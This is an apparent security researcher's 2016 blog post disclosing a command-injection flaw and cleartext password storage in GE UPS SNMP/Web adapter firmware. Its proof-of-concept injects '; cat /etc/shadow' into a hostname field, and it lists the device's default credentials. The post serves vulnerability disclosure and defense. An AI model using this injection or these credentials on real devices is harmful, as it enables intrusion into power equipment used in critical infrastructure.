Friday, January 29, 2016

[ICS] GEDE UPS SNMP Adapter Vulnerabilities

[ICS] GE Industrial Solutions - UPS SNMP Adapter Command Injection and Clear-text Storage of Sensitive Information Vulnerabilities

Reported to ICS-CERT: July 06, 2015
Fix & Advisory Released by GE: January 25, 2016 --- Yeah, 7 months to fix 2 issues in a product deployed in Critical Manufacturing & Energy sector - go figure! GE's customers should get concerned.


Vulnerability ID: GEIS16-01

GE Advisory: http://apps.geindustrial.com/publibrary/checkout/GEIS_SNMP?TNR=Application%20and%20Technical|GEIS_SNMP|PDF&filename=GEIS_SNMP.pdf

ICS-CERT Advisory:

In Progress

About GE
GE is a US-based company that maintains offices in several countries around the world.

The affected product, SNMP/Web Interface adapter, is a web server designed to present information about the Uninterruptible Power Supply (UPS). According to GE, the SNMP/Web Interface is deployed across several sectors including Critical Manufacturing and Energy. GE estimates that these products are used worldwide.

Affected Products
• All SNMP/Web Interface cards with firmware version prior to 4.8 manufactured by GE Industrial Solutions.

CVE-IDs:
CVE-2016-0861
CVE-2016-0862

VULNERABILITY OVERVIEW

A
COMMAND INJECTION
CVE-2016-0861

Device management application runs as root privileged user, and does not perform strict input validation. This allows an authenticated user to execute any system commands on the system.

Vulnerable function:
http://IP/dig.asp

Vulnerable parameter:
Hostname/IP address

PoC:

In the Hostname/IP address input, enter:
; cat /etc/shadow

Output
root:<hash>:0:0:root:/root:/bin/sh
<...other system users...>
ge:<hash>:101:0:gedeups7:/home/admin:/bin/sh
root123:<hash>:102:0:gedeups2:/home/admin:/bin/sh

B
CLEARTEXT STORAGE OF SENSITIVE INFORMATION
CVE-2016-0862

File contains sensitive account information stored in cleartext. All users, including non-admins, can view/access device's configuration, via Menu option -> Save -> Settings. The application stores all information in clear-text, including all user login and clear-text passwords.

Additional issues:
As we see with Command Injection issue above, the underlying application services are running as privileged user, root, I believe. And that folks, is another example why it is important to run services as specific, non-root users, with specific permissions to do required tasks.

Another issue you see here, is the application uses default initial credentials - ge / ge - and does not have any mechanism to force password change on the first use - Big problem.


+++++

No comments:

Post a Comment

Disclaimer

The views, information & opinions expressed in this blog are my own and do not reflect the views of my current or former employers or employees or colleagues.